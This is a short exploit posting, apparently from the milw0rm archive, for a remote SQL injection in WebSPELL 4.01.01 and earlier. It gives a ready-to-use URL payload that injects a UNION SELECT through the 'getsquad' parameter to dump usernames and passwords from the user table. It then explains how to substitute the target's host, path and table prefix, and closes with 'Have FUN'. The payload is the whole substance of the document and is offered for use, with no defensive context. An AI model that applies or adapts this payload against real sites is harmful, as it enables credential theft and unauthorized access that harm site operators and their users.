15 lines
No EOL
503 B
Text
15 lines
No EOL
503 B
Text
# WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
|
|
# by: Kiba
|
|
|
|
#EXPLOIT:
|
|
http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*
|
|
|
|
#REPLACE:
|
|
(if the website is http://yourwebsite.de/webspell/index.php)
|
|
[PAGE] with "yourwebsite.de"
|
|
[PATH] with "webspell" (if there is no subdirectory then remove it)
|
|
[PREFIX] the Prefix of the database tables (try "webs_user")
|
|
|
|
# Have FUN
|
|
|
|
# milw0rm.com [2006-10-15] |